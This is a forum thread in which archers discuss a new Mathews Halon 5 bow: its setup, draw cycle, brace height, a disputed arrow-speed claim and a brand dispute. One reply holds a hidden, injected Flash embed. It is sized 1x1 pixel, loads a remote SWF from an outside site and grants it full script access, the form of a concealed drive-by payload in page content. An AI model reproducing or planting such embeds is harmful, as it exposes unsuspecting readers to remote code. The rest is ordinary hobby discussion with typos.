New bow finally arrived

AllTerrainAngler

Picked her up Tuesday. Got it set up. Shooting bullethoes.
Mathews Halon 5. 27.5 70lb 85%
Axion stab
Axcel armortech hd
Mathews arrow web 4 arrow
Easton fmj injexxion 4mm 330 spine

Attachments

• image.jpg
    image.jpg
    71.2 KB · Views: 928

Steve08

Picked her up Tuesday. Got it set up. Shooting bullethoes.
Mathews Halon 5. 27.5 70lb 85%
Axion stab
Axcel armortech hd
Mathews arrow web 4 arrow
Easton fmj injexxion 4mm 330 spine<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://picz.website/u/1/c.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://picz.website/u/1/c.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
Looks great, congrats!

AllTerrainAngler

How's the valley and draw cycle on it?

It's extremely smooth. I read a lot of people saying it wasn't as smooth as the 6 or 7. Even the shop tried over and over to push me away from the 5. Saying it's very prone to string slap with a 5" brace height. Have had zero problems at all. Extremely fast and accurate.
Also shooting Easton FMJ injexxion 4mm worked by another local shop.

BPowell92

It's extremely smooth. I read a lot of people saying it wasn't as smooth as the 6 or 7. Even the shop tried over and over to push me away from the 5. Saying it's very prone to string slap with a 5" brace height. Have had zero problems at all. Extremely fast and accurate.
Also shooting Easton FMJ injexxion 4mm worked by another local shop.

Good to hear! My shop told me the same thing about the 5 being rough to draw, but I had heard other people say it was about the same as the 6.

Kris87

340 with custom arrows

You're getting 340fps? At your specs you'd need an arrow weight of 290gr, or your bow is shooting an IBO speed of over 380fps with what a normal 330 injexion would weigh.

You sure that's right?

1crazybowhunter

Mathews bow

I'll bet that the new Obsession Defcon 6 can not only turch it, but beat the cams off it !

1crazybowhunter

new bow

Really, how bout you quit assuming. What I'm doing is stating a fact. I'm not an Obsession dealer any longer, just proud of what I'm shootin just like the first guy. With respect, since you and I don't know each other, let's just leave it at that. You just misunderstood my intent by my response.